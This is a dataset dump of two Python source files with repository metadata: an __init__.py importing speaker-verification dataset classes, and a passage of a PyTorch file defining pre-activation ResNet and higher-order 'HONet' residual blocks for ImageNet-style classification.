| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4a1dbe89ce8a5f1ad91bb7865aff8ba48addfce9
| 246
|
py
|
Python
|
encoder/data_objects/__init__.py
|
fujiaxiang/Real-Time-Voice-Cloning
|
3b182258724c7d2cda94d418a3ad0c03dd29b302
|
[
"MIT"
] | null | null | null |
encoder/data_objects/__init__.py
|
fujiaxiang/Real-Time-Voice-Cloning
|
3b182258724c7d2cda94d418a3ad0c03dd29b302
|
[
"MIT"
] | null | null | null |
encoder/data_objects/__init__.py
|
fujiaxiang/Real-Time-Voice-Cloning
|
3b182258724c7d2cda94d418a3ad0c03dd29b302
|
[
"MIT"
] | null | null | null |
from encoder.data_objects.speaker_verification_dataset import SpeakerVerificationDataset
from encoder.data_objects.speaker_verification_dataset import SpeakerVerificationDataLoader
from encoder.data_objects.iemocap_dataset import IemocapDataset
| 49.2
| 91
| 0.922764
| 26
| 246
| 8.423077
| 0.461538
| 0.150685
| 0.205479
| 0.30137
| 0.493151
| 0.493151
| 0.493151
| 0.493151
| 0
| 0
| 0
| 0
| 0.052846
| 246
| 4
| 92
| 61.5
| 0.939914
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4a27408c5113ac9308808830efa68fdd6ad58ea5
| 40,960
|
py
|
Python
|
imagenet/models/pre_resnet_CFandIN_temp.py
|
LongJin-lab/Nematode-Connectome-Neural-Network
|
c1fcef110df7d5cfb9fec6a0778b8340e5289ede
|
[
"MIT"
] | null | null | null |
imagenet/models/pre_resnet_CFandIN_temp.py
|
LongJin-lab/Nematode-Connectome-Neural-Network
|
c1fcef110df7d5cfb9fec6a0778b8340e5289ede
|
[
"MIT"
] | null | null | null |
imagenet/models/pre_resnet_CFandIN_temp.py
|
LongJin-lab/Nematode-Connectome-Neural-Network
|
c1fcef110df7d5cfb9fec6a0778b8340e5289ede
|
[
"MIT"
] | null | null | null |
import torch.nn as nn
import torch
import torch.nn.functional as functional
from torch.nn.parameter import Parameter
import math
from torch.autograd import Variable
import numpy as np
import torch.onnx
import netron
# from init import *
from random import random
import argparse
# __all__ = ['pre_resnet18', 'pre_resnet34', 'pre_resnet50', 'pre_resnet101',
# 'pre_resnet152']
__all__ = ['honet18_in', 'honet34_in', 'honet50_in', 'pre_act_resnet18_in', 'pre_act_resnet34_in', 'pre_act_resnet50_in']
# __all__ = ['HONet34_IN', 'HONet18_IN']
parser = argparse.ArgumentParser(description='PyTorch CIFAR Training')
args = parser.parse_args()
global num_cla
num_cla = 1000
class BasicBlockWithDeathRate(nn.Module):
expansion = 1
def __init__(self, in_planes, planes, stride=1, death_rate=0., downsample=None):
super(BasicBlockWithDeathRate, self).__init__()
self.bn1 = nn.BatchNorm2d(in_planes)
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, padding=1, bias=False)
self.relu = nn.ReLU(inplace=True)
self.stride = stride
self.in_planes = in_planes
self.planes = planes
self.death_rate = death_rate
def forward(self, x):
if not self.training or torch.rand(1)[
0] >= self.death_rate: # 2nd condition: death_rate is below the upper bound
out = self.bn1(x)
out = self.relu(out)
out = self.conv1(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv2(out)
# ^ the same with Pre-ResNet
if self.training:
out /= (1. - self.death_rate) # out = out/(1. - death_rate) ? maybe it is mutiplied by the rate before
else:
if self.stride == 1:
out = Variable(torch.FloatTensor(x.size()).cuda().zero_(), requires_grad=False)
else:
size = list(x.size())
size[-1] //= 2 # Maybe it is the Height (interger, devide)
size[-2] //= 2 # Maybe it is the Width
size[-3] *= 2 # Maybe Channel
size = torch.Size(size)
out = Variable(torch.FloatTensor(size).cuda().zero_(), requires_grad=False) # all zero tensor
return out
class BasicBlock_cifar(nn.Module): # actually, this is the preact block
expansion = 1
def __init__(self, in_planes, planes, stride=1, downsample=None):
super(BasicBlock_cifar, self).__init__()
self.bn1 = nn.BatchNorm2d(in_planes)
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, padding=1, bias=False)
self.relu = nn.ReLU(inplace=True)
self.stride = stride
self.in_planes = in_planes
self.planes = planes
def forward(self, x): # Pre-ResNet
out = self.bn1(x) # wo BN
# out = x # wo BN
out = self.relu(out)
out = self.conv1(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv2(out)
return out
class HOBlock(nn.Module): # actually, this is the preact block
expansion = 1
def __init__(self, in_planes, planes, last_res_planes, l_last_res_planes, stride=1, k_ini=-9.0 / 5, fix_k=False,
stepsize=1, given_ks=[10, 10, 10, 10], downsample=None):
super(HOBlock, self).__init__()
self.bn1 = nn.BatchNorm2d(in_planes)
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, padding=1, bias=False)
self.relu = nn.ReLU(inplace=True)
# self.bn3 = nn.BatchNorm2d(planes)# 20210803
self.stride = stride
self.in_planes = in_planes
self.planes = planes
self.last_res_planes = last_res_planes
self.l_last_res_planes = l_last_res_planes
self.stepsize = stepsize
self.fix_k = fix_k
if self.fix_k:
self.k = k_ini
self.a_0 = float(given_ks[0])
self.a_1 = float(given_ks[1])
self.a_2 = float(given_ks[2])
self.b_0 = float(given_ks[3])
else:
self.k = nn.Parameter(torch.Tensor(1).uniform_(k_ini, k_ini))
# self.ks = nn.ParameterList(torch.Tensor(1).uniform_(1.0, 1.1))
# print('l_last_res_planes, last_res_planes, in_planes, planes', l_last_res_planes, last_res_planes, in_planes, planes)
if not (self.last_res_planes == -1 or self.l_last_res_planes == -1):
# if 1:
if self.planes == 32:
if in_planes == 16:
self.downsample_16_32_x = Downsample_clean(16, 32, 2)
# print('downsample_16_32_x')
if self.last_res_planes == 16:
self.downsample_16_32_l = Downsample_clean(16, 32, 2)
# print('downsample_16_32_l')
if self.l_last_res_planes == 16:
self.downsample_16_32_ll = Downsample_clean(16, 32, 2)
# print('downsample_16_32_ll')
if self.planes == 64:
if self.in_planes == 32:
self.downsample_32_64_x = Downsample_clean(32, 64, 2)
if self.last_res_planes == 32:
self.downsample_32_64_l = Downsample_clean(32, 64, 2)
if self.l_last_res_planes == 32:
self.downsample_32_64_ll = Downsample_clean(32, 64, 2)
if self.planes == 128:
if self.in_planes == 64:
self.downsample_64_128_x = Downsample_clean(64, 128, 2)
if self.last_res_planes == 64:
self.downsample_64_128_l = Downsample_clean(64, 128, 2)
if self.l_last_res_planes == 64:
self.downsample_64_128_ll = Downsample_clean(64, 128, 2)
if self.planes == 256:
if self.in_planes == 128:
self.downsample_128_256_x = Downsample_clean(128, 256, 2)
if self.last_res_planes == 128:
self.downsample_128_256_l = Downsample_clean(128, 256, 2)
if self.l_last_res_planes == 128:
self.downsample_128_256_ll = Downsample_clean(128, 256, 2)
def forward(self, x, last_res, l_last_res): # Pre-ResNet
residual = x
F_x_n = self.bn1(x) # wo BN
# F_x_n=x
F_x_n = self.relu(F_x_n)
F_x_n = self.conv1(F_x_n)
F_x_n = self.bn2(F_x_n)
F_x_n = self.relu(F_x_n)
F_x_n = self.conv2(F_x_n)
# if not (isinstance(last_res,int) or isinstance(l_last_res,int)):
# print('F_x_n.size(), residual.size(),last_res.size(),l_last_res.size()', F_x_n.size()[1], residual.size()[1],last_res.size()[1],l_last_res.size()[1])
# print('planes, in_planes, last_res_planes, l_last_res_planes', self.planes, self.in_planes, self.last_res_planes, self.l_last_res_planes)
if not (isinstance(last_res, int) or isinstance(l_last_res, int)):
# print('HO')
# if 1:
if self.planes == 32:
if self.in_planes == 16:
residual = self.downsample_16_32_x(residual)
# print('residual.size()', residual.size())
if self.last_res_planes == 16:
last_res = self.downsample_16_32_l(last_res)
# print('last_res.size()', last_res.size())
if self.l_last_res_planes == 16:
l_last_res = self.downsample_16_32_ll(l_last_res)
# print('l_last_res.size()', l_last_res.size())
if self.planes == 64:
if self.in_planes == 32:
residual = self.downsample_32_64_x(residual)
if self.last_res_planes == 32:
last_res = self.downsample_32_64_l(last_res)
if self.l_last_res_planes == 32:
l_last_res = self.downsample_32_64_ll(l_last_res)
if self.planes == 128:
if self.in_planes == 64:
residual = self.downsample_64_128_x(residual)
if self.last_res_planes == 64:
last_res = self.downsample_64_128_l(last_res)
if self.l_last_res_planes == 64:
l_last_res = self.downsample_64_128_ll(l_last_res)
if self.planes == 256:
if self.in_planes == 128:
residual = self.downsample_128_256_x(residual)
if self.last_res_planes == 128:
last_res = self.downsample_128_256_l(last_res)
if self.l_last_res_planes == 128:
l_last_res = self.downsample_128_256_ll(l_last_res)
if not self.fix_k:
self.b_0 = (3 * self.k - 1) / (self.k * 2)
self.a_0 = (3 * self.k + 3) / (self.k * 4)
self.a_1 = -1 / (self.k)
self.a_2 = (self.k + 1) / (4 * self.k)
# print("trainable")
x = torch.mul(self.stepsize, torch.mul(self.b_0, F_x_n)) + torch.mul(self.a_0, residual) + torch.mul(
self.a_1, last_res) + torch.mul(self.a_2, l_last_res)
# print('x', x[0][0][0][0])
# print("self.a_0, self.a_1, self.a_2, self.b_0", self.a_0, self.a_1, self.a_2, self.b_0)
else:
# print('res')
x = F_x_n
# x = self.bn3(x)
l_last_res = last_res
last_res = residual # x means the residual
# residual = x
return x, last_res, l_last_res, self.k
class GaussianNoise(nn.Module):
def __init__(self, stddev):
super(GaussianNoise, self).__init__()
self.stddev = stddev
def forward(self, x):
if self.training:
return x + torch.autograd.Variable(torch.randn(x.size()).cuda() * self.stddev, requires_grad=False)
return x
class Bottleneck_cifar(nn.Module):
expansion = 4
def __init__(self, in_planes, planes, stride=1):
super(Bottleneck_cifar, self).__init__()
self.bn1 = nn.BatchNorm2d(in_planes)
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn3 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.relu = nn.ReLU(inplace=True)
self.in_planes = in_planes
self.planes = planes
def forward(self, x):
out = self.bn1(x)
out = self.relu(out)
out = self.conv1(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn3(out)
out = self.relu(out)
out = self.conv3(out)
return out
class HoBottleneck(nn.Module):
expansion = 4
def __init__(self, in_planes, planes, last_res_planes, l_last_res_planes, stride=1, k_ini=-9.0 / 5, fix_k=False,
stepsize=1, given_ks=[1.0 / 3, 5.0 / 9, 1.0 / 9, 16.0 / 9]):
super(HoBottleneck, self).__init__()
self.bn1 = nn.BatchNorm2d(in_planes)
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn3 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.relu = nn.ReLU(inplace=True)
self.expansion = 4
self.in_planes = in_planes
self.planes = planes * self.expansion
self.last_res_planes = last_res_planes
self.l_last_res_planes = l_last_res_planes
self.stepsize = stepsize
self.fix_k = fix_k
if self.fix_k:
self.k = k_ini
self.a_0 = float(given_ks[0])
self.a_1 = float(given_ks[1])
self.a_2 = float(given_ks[2])
self.b_0 = float(given_ks[3])
else:
self.k = nn.Parameter(torch.Tensor(1).uniform_(k_ini, k_ini))
# self.ks=nn.ParameterList(torch.Tensor(1).uniform_(1.0, 1.1))
# self.downsample_16_64_res = Downsample_clean(16, 64, 1)
# if not (last_res_planes == -1 and l_last_res_planes == -1):
# if 1:
if not (last_res_planes == -1 or l_last_res_planes == -1):
if self.planes == 32:
if in_planes == 16:
self.downsample_16_32_x = Downsample_clean(16, 32, 2)
# print('downsample_16_32_x')
if last_res_planes == 16:
self.downsample_16_32_l = Downsample_clean(16, 32, 2)
# print('downsample_16_32_l')
if l_last_res_planes == 16:
self.downsample_16_32_ll = Downsample_clean(16, 32, 2)
# print('downsample_16_32_ll')
if self.planes == 64:
if self.in_planes == 16:
self.downsample_16_64_x = Downsample_clean(16, 64, 1)
# print('downsample_16_32_x')
if self.last_res_planes == 16:
self.downsample_16_64_l = Downsample_clean(16, 64, 1)
# print('downsample_16_32_l')
if self.l_last_res_planes == 16:
self.downsample_16_64_ll = Downsample_clean(16, 64, 1)
if self.in_planes == 32:
self.downsample_32_64_x = Downsample_clean(32, 64, 2)
if self.last_res_planes == 32:
self.downsample_32_64_l = Downsample_clean(32, 64, 2)
if self.l_last_res_planes == 32:
self.downsample_32_64_ll = Downsample_clean(32, 64, 2)
if self.planes == 128:
if self.in_planes == 64:
self.downsample_64_128_x = Downsample_clean(64, 128, 2)
if self.last_res_planes == 64:
self.downsample_64_128_l = Downsample_clean(64, 128, 2)
if self.l_last_res_planes == 64:
self.downsample_64_128_ll = Downsample_clean(64, 128, 2)
if self.planes == 256:
if self.in_planes == 128:
self.downsample_128_256_x = Downsample_clean(128, 256, 2)
if self.last_res_planes == 128:
self.downsample_128_256_l = Downsample_clean(128, 256, 2)
if self.l_last_res_planes == 128:
self.downsample_128_256_ll = Downsample_clean(128, 256, 2)
def forward(self, x, last_res, l_last_res):
# if self.expansion==4:
# residual = self.downsample_16_64_res(x)
# elif self.expansion==1:
# residual = x
residual = x
F_x_n = self.bn1(x)
F_x_n = self.relu(F_x_n)
F_x_n = self.conv1(F_x_n)
F_x_n = self.bn2(F_x_n)
F_x_n = self.relu(F_x_n)
F_x_n = self.conv2(F_x_n)
F_x_n = self.bn3(F_x_n)
F_x_n = self.relu(F_x_n)
F_x_n = self.conv3(F_x_n)
# self.planes = self.planes*self.expansion
# if not (isinstance(last_res,int) or isinstance(l_last_res,int)):
# print('F_x_n.size(), residual.size(),last_res.size(),l_last_res.size()', F_x_n.size()[1], residual.size()[1],last_res.size()[1],l_last_res.size()[1])
# print('planes, in_planes, last_res_planes, l_last_res_planes', self.planes, self.in_planes, self.last_res_planes, self.l_last_res_planes)
# elif not (isinstance(last_res,int)):
# print('F_x_n.size(), residual.size(),last_res.size(),l_last_res.size()', F_x_n.size()[
# 1], residual.size()[1], last_res.size()[1], l_last_res)
# print('planes, in_planes, last_res_planes, l_last_res_planes', self.planes, self.in_planes, self.last_res_planes, self.l_last_res_planes)
# else:
# print('F_x_n.size(), residual.size(),last_res.size(),l_last_res.size()', F_x_n.size()[1], residual.size()[1],last_res,l_last_res)
# print('planes, in_planes, last_res_planes, l_last_res_planes', self.planes, self.in_planes, self.last_res_planes, self.l_last_res_planes)
if not (isinstance(last_res, int) or isinstance(l_last_res, int)):
# print('HO')
# if 1:
if self.planes == 32:
if self.in_planes == 16:
residual = self.downsample_16_32_x(residual)
# print('residual.size()', residual.size())
if self.last_res_planes == 16:
last_res = self.downsample_16_32_l(last_res)
# print('last_res.size()', last_res.size())
if self.l_last_res_planes == 16:
l_last_res = self.downsample_16_32_ll(l_last_res)
# print('l_last_res.size()', l_last_res.size())
if self.planes == 64:
if self.in_planes == 16:
residual = self.downsample_16_64_x(residual)
if self.last_res_planes == 16:
last_res = self.downsample_16_64_l(last_res)
if self.l_last_res_planes == 16:
l_last_res = self.downsample_16_64_ll(l_last_res)
if self.in_planes == 32:
residual = self.downsample_32_64_x(residual)
if self.last_res_planes == 32:
last_res = self.downsample_32_64_l(last_res)
if self.l_last_res_planes == 32:
l_last_res = self.downsample_32_64_ll(l_last_res)
if self.planes == 128:
if self.in_planes == 64:
residual = self.downsample_64_128_x(residual)
if self.last_res_planes == 64:
last_res = self.downsample_64_128_l(last_res)
if self.l_last_res_planes == 64:
l_last_res = self.downsample_64_128_ll(l_last_res)
if self.planes == 256:
if self.in_planes == 128:
residual = self.downsample_128_256_x(residual)
if self.last_res_planes == 128:
last_res = self.downsample_128_256_l(last_res)
if self.l_last_res_planes == 128:
l_last_res = self.downsample_128_256_ll(l_last_res)
if not (isinstance(last_res, int) or isinstance(l_last_res, int)):
if not self.fix_k:
self.b_0 = (3 * self.k - 1) / (self.k * 2)
self.a_0 = (3 * self.k + 3) / (self.k * 4)
self.a_1 = -1 / (self.k)
self.a_2 = (self.k + 1) / (4 * self.k)
# x = torch.mul(b_0, F_x_n) + torch.mul(a_0, residual) + torch.mul(a_1, last_res) + torch.mul(a_2, l_last_res)
x = torch.mul(self.stepsize, torch.mul(self.b_0, F_x_n)) + torch.mul(self.a_0, residual) + torch.mul(
self.a_1, last_res) + torch.mul(self.a_2, l_last_res)
else:
# print('res')
x = F_x_n
l_last_res = last_res
last_res = residual # x means the residual
# residual = x
# print('x.sixe()[1], residual.size()[1]', x.size()[1], residual.size()[1])
return x, last_res, l_last_res, self.k
class Downsample(nn.Module): # ReLU and BN are involved in this downsample
def __init__(self, in_planes, out_planes, stride=2):
super(Downsample, self).__init__()
self.downsample = nn.Sequential(
nn.BatchNorm2d(in_planes),
nn.ReLU(inplace=True),
nn.Conv2d(in_planes, out_planes,
kernel_size=1, stride=stride, bias=False)
)
def forward(self, x):
x = self.downsample(x)
return x
class Downsample_clean(nn.Module): # ReLU and BN are involved in this downsample
def __init__(self, in_planes, out_planes, stride=2):
super(Downsample_clean, self).__init__()
self.downsample_ = nn.Sequential(
# nn.BatchNorm2d(in_planes),
# nn.ReLU(inplace=True),
nn.Conv2d(in_planes, out_planes,
kernel_size=1, stride=stride, bias=False)
)
def forward(self, x):
x = self.downsample_(x)
return x
class Downsample_real(nn.Module): # ReLU and BN are not involved in this downsample
def __init__(self, in_shape, out_shape):
super(Downsample_real, self).__init__()
# in_shape = x.shape()
self.in_planes = in_shape[1]
self.out_planes = out_shape[1]
self.stride = int(in_shape[2] / out_shape[2])
# [256, 64, 32, 32]->[256, 128, 16, 16]
self.downsample_real = nn.Sequential(
# nn.BatchNorm2d(in_planes),
# nn.ReLU(inplace=True),
nn.Conv2d(self.in_planes, self.out_planes,
kernel_size=1, stride=self.stride, bias=False)
)
def forward(self, x):
x = self.downsample_real(x)
return x
class MResNet(nn.Module):
# def __init__(self,block,layers,pretrain=True,num_classes=num_cla,stochastic_depth=False,PL=0.5,noise_level=0.001,noise=False):
def __init__(self, block, layers, pretrain=False, num_classes=num_cla, stochastic_depth=False, PL=1.0,
noise_level=0.001, noise=False):
self.in_planes = 16
self.planes = [16, 32, 64]
self.strides = [1, 2, 2]
super(MResNet, self).__init__()
self.noise = noise # what for?
self.block = block
self.conv1 = nn.Conv2d(3, 16, kernel_size=3, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(16)
self.relu = nn.ReLU(inplace=True)
self.pretrain = pretrain
self.ks = nn.ParameterList([nn.Parameter(torch.Tensor(1).uniform_(1.0, 1.1)) for i in
range(layers[0] + layers[1] + layers[2])]) # each layer has a trainable $k_n$
self.stochastic_depth = stochastic_depth
blocks = []
n = layers[0] + layers[1] + layers[2]
if not self.stochastic_depth:
for i in range(3):
blocks.append(block(self.in_planes, self.planes[i], self.strides[i]))
self.in_planes = self.planes[i] * block.expansion
for j in range(1, layers[
i]): # Recalling "MResNet(BasicBlock,[3,3,3],**kwargs)", and "layers" is assigned as "[3,3,3]"; then j is 0 to 2
blocks.append(block(self.in_planes, self.planes[i])) # three (Basic) Blocks
else: # with death_rates
death_rates = [i / (n - 1) * (1 - PL) for i in range(n)] # n is the sum of elements of "[3,3,3]"
# print(death_rates)
for i in range(3):
blocks.append(block(self.in_planes, self.planes[i], self.strides[i],
death_rate=death_rates[i * layers[0]])) # note that layers[k] == layers[j]
self.in_planes = self.planes[i] * block.expansion
for j in range(1, layers[i]):
blocks.append(block(self.in_planes, self.planes[i], death_rate=death_rates[i * layers[0] + j]))
self.blocks = nn.ModuleList(blocks) # ModuleList cannot determine the sequence of layers
self.downsample1 = Downsample(16, 64, stride=1) # Downsample: (in_planes,out_planes,stride=2):
# self.downsample1=nn.Conv2d(16, 64,
# kernel_size=1, stride=1, bias=False)
self.downsample21 = Downsample(16 * block.expansion,
32 * block.expansion) # "expansion" is 1 for BasicBlocks and is 4 for the Bottleneck
# self.downsample22=Downsample(16*block.expansion,32*block.expansion)
self.downsample31 = Downsample(32 * block.expansion, 64 * block.expansion)
# self.downsample32=Downsample(32*block.expansion,64*block.expansion)
self.bn = nn.BatchNorm2d(64 * block.expansion)
self.avgpool = nn.AvgPool2d(8)
self.fc = nn.Linear(64 * block.expansion, num_classes)
for m in self.modules(): # initialization
if isinstance(m, nn.Conv2d): # if m is a conv
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels # element num of the kernel
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def change_state(self):
self.pretrain = not self.pretrain
def forward(self, x):
x = self.conv1(x)
# x=self.bn1(x)
# x=self.relu(x)
if self.block.expansion == 4: # 4 is the "expansion" of the "Bottleneck". If "Bottleneck" is used, we need to downsample
residual = self.downsample1(x) # residual.size()[1]: 16->64
else:
residual = x
x = self.blocks[0](x) + residual # x.size()[1]: 16->64
last_res = residual
for i, b in enumerate(self.blocks): # index and content
if i == 0:
continue
residual = x
if b.in_planes != b.planes * b.expansion: # sizes of the input and output are not the same
if b.planes == 32:
residual = self.downsample21(x)
# if not self.pretrain:
# last_res=self.downsample22(last_res)
elif b.planes == 64:
residual = self.downsample31(x)
# if not self.pretrain:
# last_res=self.downsample32(last_res)
x = b(x)
# print(x.size())
# print(residual.size())
x += residual
elif self.pretrain: #
x = b(x) + residual
else: # in.channel = out.channel and not pretrain
x = b(x) + self.ks[i].expand_as(residual) * residual + (1 - self.ks[i]).expand_as(
last_res) * last_res # "B.expand_as (A)": expand B in A's shape
last_res = residual
x = self.bn(x)
x = self.relu(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
return x, self.ks
class HONet_v2(nn.Module):
def __init__(self, block, layers, k_ini=-9.0 / 5, pretrain=False, num_classes=num_cla, stochastic_depth=False,
PL=1.0, noise_level=0.001,
noise=False):
self.in_planes = 16
self.planes = [16, 32, 64]
self.last_res_planes = -1
self.l_last_res_planes = -1
self.strides = [1, 2, 2]
super(HONet_v2, self).__init__()
self.noise = noise # what for?
self.block = block
self.conv1 = nn.Conv2d(3, 16, kernel_size=3, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(16)
self.relu = nn.ReLU(inplace=True)
self.pretrain = pretrain
self.stochastic_depth = stochastic_depth
self.k_ini = k_ini
# self.stepsize =nn.Parameter(torch.Tensor(1).uniform_(1, 1))
blocks = []
self.ks = []
n = layers[0] + layers[1] + layers[2]
l = 0
if not self.stochastic_depth:
for i in range(3): # there are 3 elements in the list like [7,7,7]
# print('v2: self.planes[i], self.in_planes, self.last_res_planes, self.l_last_res_planes', self.planes[i]* block.expansion, self.in_planes, self.last_res_planes, self.l_last_res_planes)
blocks.append(
block(self.in_planes, self.planes[i], self.last_res_planes, self.l_last_res_planes, self.strides[i],
k_ini=self.k_ini))
# ###
# if
#
# ###
# self.l_last_res_planes = self.last_res_planes
# self.last_res_planes = self.in_planes
if l == 0 or l == 1:
self.l_last_res_planes = self.last_res_planes
self.last_res_planes = self.in_planes
else:
self.l_last_res_planes = self.planes[i] * block.expansion
self.last_res_planes = self.planes[i] * block.expansion
self.in_planes = self.planes[i] * block.expansion
l += 1
# print('l', l)
# print('i', i)
for j in range(1, layers[
i]): # Recalling "MResNet(BasicBlock,[3,3,3],**kwargs)", and "layers" is assigned as "[3,3,3]"; then j is 1 to 2
# if l == 0:
# self.l_last_res_planes = self.last_res_planes
# self.last_res_planes = self.in_planes
#
# elif l==1:
# self.l_last_res_planes = self.last_res_planes
# self.last_res_planes = self.in_planes
# else:
# self.l_last_res_planes = self.planes[i]*block.expansion
# self.last_res_planes = self.planes[i]*block.expansion
# self.plane = self.planes[i]*block.expansion
# print('j', j)
# print('v2: self.planes[i], self.in_planes, self.last_res_planes, self.l_last_res_planes', self.planes[i]* block.expansion, self.in_planes, self.last_res_planes, self.l_last_res_planes)
blocks.append(block(self.in_planes, self.planes[i], self.last_res_planes, self.l_last_res_planes,
k_ini=self.k_ini)) # three (Basic) Blocks
# self.l_last_res_planes = self.last_res_planes
# self.last_res_planes = self.in_planes
if l == 0 or l == 1:
self.l_last_res_planes = self.last_res_planes
self.last_res_planes = self.in_planes
else:
self.l_last_res_planes = self.planes[i] * block.expansion
self.last_res_planes = self.planes[i] * block.expansion
l += 1
# print('l', l)
else: # with death_rates
death_rates = [i / (n - 1) * (1 - PL) for i in range(n)] # n is the sum of elements of "[3,3,3]"
# print(death_rates)
for i in range(3):
blocks.append(
block(self.in_planes, self.planes[i], self.last_res_planes, self.l_last_res_planes, self.strides[i],
k_ini=self.k_ini, death_rate=death_rates[i * layers[0]])) # note that layers[k] == layers[j]
self.l_last_res_planes = self.last_res_planes
self.last_res_planes = self.in_planes
self.in_planes = self.planes[i] * block.expansion
# print('i', i)
for j in range(1, layers[i]):
# print('j', j)
blocks.append(block(self.in_planes, self.planes[i], self.last_res_planes, self.l_last_res_planes,
k_ini=self.k_ini, death_rate=death_rates[i * layers[0] + j]))
self.l_last_res_planes = self.last_res_planes
self.last_res_planes = self.in_planes
self.blocks = nn.ModuleList(blocks) # ModuleList cannot determine the sequence of layers
self.downsample1 = Downsample(16, 64, stride=1) # Downsample: (in_planes,out_planes,stride):
self.bn = nn.BatchNorm2d(64 * block.expansion)
self.avgpool = nn.AvgPool2d(8)
self.fc = nn.Linear(64 * block.expansion, num_classes)
for m in self.modules(): # initialization
if isinstance(m, nn.Conv2d): # if m is a conv
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels # element num of the kernel
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def change_state(self):
self.pretrain = not self.pretrain
def forward(self, x):
self.ks = []
x = self.conv1(x)
last_res = -1
l_last_res = -1
# x=self.bn1(x)
# x=self.relu(x)
if self.block.expansion == 4: # 4 is the "expansion" of the "Bottleneck". If "Bottleneck" is used, we need to downsample
residual = self.downsample1(x)
# print('downsample1')
else:
residual = x
x, last_res, l_last_res, k = self.blocks[0](x, last_res, l_last_res)
# print('v2: x.sixe()[1], residual.size()[1]', x.size()[1], residual.size()[1])
x += residual
# l_last_res = residual
residual = x
x, last_res, l_last_res, k = self.blocks[1](x, last_res, l_last_res)
# x = self.blocks[1](x)[0] + residual
x += residual
# last_res = residual
# residual = x # moved from below. Flag:318
### \end
for i, b in enumerate(self.blocks): # index and content
if i == 0 or i == 1:
# print('i', i)
continue
residual = x # moved up. Flag:318
####
# if b.in_planes != b.planes * b.expansion: # sizes of the input and output are not the same
# if b.planes == 32:
# residual = self.downsample21(x)
# # if not self.pretrain:
# # last_res=self.downsample22(last_res)
# elif b.planes == 64:
# residual = self.downsample31(x)
#
# x = b(x)
# # print(x.size())
# # print(residual.size())
# x += residual
####
if self.pretrain: #
x = b(x) + residual
else: # in.channel = out.channel and not pretrain
# \begin HONet core
x, last_res, l_last_res, k = b(x, last_res, l_last_res)
self.ks += k.data
# print('i, ks', i, self.ks)
# \end HONet core
# print('cnt', cnt1, cnt2, cnt3, cnt4)
x = self.bn(x)
x = self.relu(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
# print('out')
return x, self.ks
class HONet_stepsize(nn.Module):
def __init__(self, block, layers, k_ini=-9.0 / 5, pretrain=False, num_classes=num_cla, stochastic_depth=False,
PL=1.0, noise_level=0.001,
noise=False, dataset='cifar10'):
self.in_planes = 16
self.planes = [16, 32, 64]
self.last_res_planes = -1
self.l_last_res_planes = -1
self.strides = [1, 2, 2]
super(HONet_stepsize, self).__init__()
self.noise = noise # what for?
self.block = block
self.conv1 = nn.Conv2d(3, 16, kernel_size=3, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(16)
self.relu = nn.ReLU(inplace=True)
self.pretrain = pretrain
self.stochastic_depth = stochastic_depth
self.k_ini = k_ini
self.stepsize = nn.Parameter(torch.Tensor(1).uniform_(1, 1))
blocks = []
self.ks = []
n = layers[0] + layers[1] + layers[2]
l = 0
if not self.stochastic_depth:
for i in range(3): # there are 3 elements in the list like [7,7,7]
# print('v2: self.planes[i], self.in_planes, self.last_res_planes, self.l_last_res_planes', self.planes[i]* block.expansion, self.in_planes, self.last_res_planes, self.l_last_res_planes)
blocks.append(
block(self.in_planes, self.planes[i], self.last_res_planes, self.l_last_res_planes, self.strides[i],
k_ini=self.k_ini, stepsize=self.stepsize))
# ###
# if
#
# ###
# self.l_last_res_planes = self.last_res_planes
# self.last_res_planes = self.in_planes
if l == 0 or l == 1:
self.l_last_res_planes = self.last_res_planes
self.last_res_planes = self.in_planes
else:
self.l_last_res_planes = self.planes[i] * block.expansion
self.last_res_planes = self.planes[i] * block.expansion
self.in_planes = self.planes[i] * block.expansion
l += 1
# print('l', l)
# print('i', i)
for j in range(1, layers[
